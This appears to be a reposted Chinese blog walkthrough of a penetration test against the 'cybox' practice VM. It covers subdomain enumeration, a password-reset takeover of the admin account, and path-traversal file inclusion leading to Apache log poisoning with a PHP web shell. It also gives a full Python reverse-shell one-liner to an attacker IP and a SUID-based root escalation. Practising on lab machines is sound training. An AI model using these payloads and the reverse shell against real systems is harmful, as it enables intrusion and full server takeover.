C/C++教程

cybox靶机渗透测试

本文主要是介绍cybox靶机渗透测试,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

cybox靶机渗透测试

    • 环境
    • 工具
    • 流程

环境

靶机;kali

工具

nmap; netdiscover; hydra; gobuster; brupsuite; nc

流程

主机发现端口扫描
在这里插入图片描述
在web首页发现域名
在这里插入图片描述
添加到etc/hosts
在这里插入图片描述
使用gobuster工具对其子域名扫描

gobuster vhost -u http://cybox.company/ -w /usr/share/wordlists/dirb/big.txt

在这里插入图片描述
同样添加到/etc/hosts
在这里插入图片描述
访问域名后发现分别为登录注册和一个ftp一个webmail界面
在这里插入图片描述
这里先注册一个用户
Webmail网站与前面的不互通所以在create user这个网页创建一个同名的用户密码与账号
在这里插入图片描述
有个找回密码怀疑存在越权登陆上webmail后这里有个用邮件找回密码用刚刚创建的用户找回密码
在这里插入图片描述
邮箱收到一个链接开启用bp截断
在这里插入图片描述
把qwe改为admin
在这里插入图片描述
跳转后就可以修改admin@cybox.company的密码l
在这里插入图片描述
用admin账号登录上去就一个界面Admin panel
在这里插入图片描述
右键源码发现可能存在文件包含漏洞的源码
在这里插入图片描述
构造url测试一下

http://monitor.cybox.company/admin/styles.php?style=../../../../../../etc/passwd

在这里插入图片描述
果然存在再看一下apache日志

http://monitor.cybox.company/admin/styles.php?style=../../../../../../opt/bitnami/apache2/logs/access_log

发现一堆ftp请求
在这里插入图片描述
打开ftp的域名打开bp抓包刷新页面,拦一个包下来,User-Agent改成cmd命令的php代码<?php system($_GET['a']);?>
在这里插入图片描述
发送到repeater send一些数据包
在这里插入图片描述
测试一下在url后面加个

&a=ipconfig
http://monitor.cybox.company/admin/styles.php?style=../../../../../../opt/bitnami/apache2/logs/access_log%00&a=ifconfig

在这里插入图片描述
测试成功
在这里插入图片描述
使用脚本构造url同时在攻击机上设置监听

http://monitor.cybox.company/admin/styles.php?style=../../../../../../opt/bitnami/apache2/logs/access_log%00&a=python -c"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.1.137',443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

设置好监听:nc –nvlp 443后刷新页面得到一个低权限的shell
在这里插入图片描述
find / -perm -u=s -type f 2>/dev/null 查找有权限的文件
在这里插入图片描述
打开文件registerlauncher
strings /opt/registerlauncher(使用cat有乱码)
找到一个敏感目录/opt/register
在这里插入图片描述
打开发现是一个创建用户的文件使用脚本使其与register页面实现交互python -c "import pty;pty.spawn('/bin/bash');"
在这里插入图片描述
然后回到creat user页面创建一个sudo用户
在这里插入图片描述
直接登录就能提权到root
在这里插入图片描述

这篇关于cybox靶机渗透测试的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!